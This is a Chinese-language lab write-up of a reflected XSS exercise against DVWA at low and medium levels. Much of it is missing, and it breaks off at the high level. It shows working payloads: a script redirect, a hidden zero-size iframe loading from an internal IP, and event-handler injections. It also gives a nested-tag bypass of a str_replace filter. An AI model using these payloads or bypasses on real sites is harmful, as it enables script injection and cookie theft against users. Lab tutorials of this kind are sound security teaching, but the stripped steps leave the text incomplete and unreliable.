DVWA-反射型XSS漏洞

(一)将DVWA的级别设置为low
1.1 查看源代码,没有对参数做任何过滤,直接输出
DVWA-反射型XSS漏洞_第1张图片
1.2尝试一般的XSS攻击
①输入
弹出一个文本的对话框

onload的作用当页面载入完毕后执行代码(即弹出对话框)
click1
onclick 事件会在对象被点击时发生

Img后是一个图像的url,当错误时,执行onerror后的代码
onerror 事件在视频/音频(audio/video)数据加载期间发生错误时触发
⑤重定向

<script>window.location='http://www.163.com'</script>
<iframe src='http://192.168.10.141/a.jpg' height='0' width='0'><iframe>

window.location用于获得当前页面的URL,并把浏览器重定向到新的页面
iframe作用是文档中的文档,将原页面变为一个长和宽为0的网页
DVWA-反射型XSS漏洞_第2张图片
⑥获取cookie
DVWA-反射型XSS漏洞_第3张图片
(二)将DVWA的级别设置为medium
1.分析源码, str_replace替换函数过滤了

<Script>alert('666')</script>

2.2组合过滤条件绕过

<scr<script>ipt>alert('777')</script>

即代替了一个

<body onload=alert('1')> <a href='' onclick=alert('2')>click</a> <a href='' onclick=alert(/3/)>click</a>

(三)将DVWA的级别设置为High
1.分析源码,可以看到,使用了preg_replace正则表达式函数,只对

你可能感兴趣的:(WEB)